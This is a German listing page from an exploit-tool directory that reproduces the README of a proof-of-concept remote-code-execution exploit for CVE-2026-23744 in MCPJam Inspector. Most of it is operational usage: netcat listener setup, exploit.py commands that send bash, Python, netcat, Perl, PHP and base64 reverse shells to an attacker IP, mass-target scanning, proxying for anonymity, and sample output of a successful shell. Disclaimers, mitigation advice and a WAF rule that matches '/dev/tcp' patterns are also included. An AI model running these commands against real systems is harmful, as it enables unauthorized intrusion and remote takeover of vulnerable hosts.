Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-MCPJam-Exploit — Ein Proof-of-Concept-Exploit für CVE-2026-23744 - die Remote Code Execution (RCE)-Schwachstelle in MCPJam Inspector. Dieses Tool demonstriert den Sicherheitsfehler in den Versionen <=1.4.2 und hilft Sicherheitsforschern, Patches zu verifizieren. Nur für autorisierte Tests und zu Bildungszwecken. Enthält mehrere Payload-Optionen, Befehlsausführung und Sitzungsverwaltung. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungPayload-Entwicklung
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-23744-MCPJam-Exploit

Repository anzeigen
71vor 1 MonatNoch nicht geprüft

Ein Proof-of-Concept-Exploit für CVE-2026-23744 - die Remote Code Execution (RCE)-Schwachstelle in MCPJam Inspector. Dieses Tool demonstriert den Sicherheitsfehler in den Versionen <=1.4.2 und hilft Sicherheitsforschern, Patches zu verifizieren. Nur für autorisierte Tests und zu Bildungszwecken. Enthält mehrere Payload-Optionen, Befehlsausführung und Sitzungsverwaltung.

Teilen

CVE-2026-23744 MCPJam Inspector RCE Exploit

Security Research Python 3.7+ Version Author


⚠️ HAFTUNGSAUSSCHLUSS

Dieses Tool ist NUR für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Nutzung ist illegal. Die Nutzer übernehmen die volle Verantwortung für ihre Handlungen.


📋 Übersicht

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-23744, eine nicht authentifizierte Remote-Code-Ausführungs-Sicherheitslücke (RCE) in MCPJam Inspector Versionen <=1.4.2. Die Schwachstelle hat einen kritischen CVSS-Score von 9,8, was auf ein schwerwiegendes Risiko mit einem Netzwerk-Angriffsvektor hinweist.


📸 Screenshots

ex

🚀 Funktionen

Das Exploit-Tool bietet eine umfassende Reihe von Funktionen, die für effektive Sicherheitstests entwickelt wurden:

  • Multi-Payload-Unterstützung: Enthält Bash-, Python-, Netcat-, Perl-, PHP- und Base64-Payloads.
  • Befehlsausführung: Führt Befehle auf dem Zielsystem mit Ausgabenerfassung aus.
  • Zielscannen: Scannt mehrere Ziele mit konfigurierbarer Ratenbegrenzung.
  • Sitzungsverwaltung: Persistente Sitzungsverwaltung für laufende Tests.
  • Proxy-Unterstützung: Integration mit Proxys für anonymen oder gerouteten Traffic.
  • Ziel-Fingerprinting: Identifiziert Eigenschaften des Zielsystems.
  • Auto-Listener-Einrichtung: Konfiguriert automatisch Listener für Reverse-Shells.

📦 Installation

Befolgen Sie diese Schritte, um das Exploit-Tool einzurichten:

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Abhängigkeiten installieren:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Anwendungsbeispiele

Grundlegende Ausnutzung

Um einen grundlegenden Exploit zu starten, richten Sie zuerst einen Listener ein und führen Sie dann das Exploit-Skript aus:

root@kitploit:~
# Listener starten
nc -lvnp 4444

# Exploit ausführen
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Befehlsausführung

Führen Sie einzelne Befehle oder Befehle aus einer Datei aus:

root@kitploit:~
# Einzelnen Befehl ausführen
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Befehle aus Datei ausführen
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Verschiedene Payloads

Nutzen Sie verschiedene Payload-Typen für unterschiedliche Szenarien:

root@kitploit:~
# Python Reverse-Shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat Reverse-Shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64-kodierter Payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Zielscannen

Scannen Sie mehrere Ziele auf Schwachstellen:

root@kitploit:~
# Zieldatei erstellen
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Nach anfälligen Zielen scannen
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Erweiterte Optionen

Erkunden Sie erweiterte Funktionalitäten wie Fingerprinting, Proxy-Nutzung, ausführlichen Modus und Auto-Listener-Einrichtung:

root@kitploit:~
# Mit Fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# Mit Proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Ausführlicher Modus
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Auto-Listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Payload-Typen


📊 Beispiel-Ausgabe

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ Minderung

Sofortige Maßnahmen

Zum Schutz vor CVE-2026-23744 ist es entscheidend, die folgenden sofortigen Maßnahmen zu ergreifen:

  • Aktualisieren Sie MCPJam Inspector auf Version >1.4.2.
  • Isolieren Sie anfällige Systeme vom Netzwerk.
  • Überwachen Sie auf verdächtige POST-Anfragen an /api/mcp/connect.
  • Implementieren Sie Web Application Firewall (WAF)-Regeln, um schädliche Muster zu blockieren.

WAF-Regel-Beispiel

Beispiel für eine Nginx-WAF-Regel zum Blockieren allgemeiner schädlicher Muster:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ FAQ

F: Ist die Nutzung legal?

A: Dieses Tool ist nur legal auf Systemen zu verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

F: Welche Systeme sind anfällig?

A: MCPJam Inspector Versionen <=1.4.2 sind anfällig.

F: Wie kann ich meine Systeme schützen?

A: Aktualisieren Sie MCPJam Inspector sofort auf Version >1.4.2.


📚 Referenzen

  • CVE-2026-23744 MITRE

👤 Autor

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Änderungsprotokoll

Version 2.0 (14. Juli 2026)

  • ✅ Zuverlässigkeit der Listener-Überprüfung behoben
  • ✅ Befehlsausführungsmodus implementiert
  • ✅ Ziel-Fingerprinting hinzugefügt
  • ✅ Sitzungsverwaltung verbessert
  • ✅ Payload-Fallbacks hinzugefügt

Version 1.0 (10. Juli 2026)

  • ✅ Erste Veröffentlichung

⚠️ Abschließende Warnung

Die unbefugte Nutzung dieses Tools ist illegal und kann schwerwiegende Konsequenzen haben, einschließlich:

  • Strafrechtliche Verfolgung
  • Zivilrechtliche Klagen
  • Dauerhafter Eintrag im Strafregister
  • Berufliche Sanktionen

Gemacht mit ❤️ von Sudeepa Wanigarathna

Tool herunterladen
AttributDetails
CVE-IDCVE-2026-23744
SicherheitslückeNicht authentifizierte Remote-Code-Ausführung
Betroffene Versionen<=1.4.2
CVSS-Score9.8 (Kritisch)
AngriffsvektorNetzwerk
TypBefehlAm besten geeignet für
bashBash Reverse-ShellDie meisten Linux-Systeme
pythonPython3 Reverse-ShellSysteme mit Python
ncNetcat Reverse-ShellSysteme mit Netcat
perlPerl Reverse-ShellSysteme mit Perl
phpPHP Reverse-ShellSysteme mit PHP
base64Base64-kodiertUmgehung der Erkennung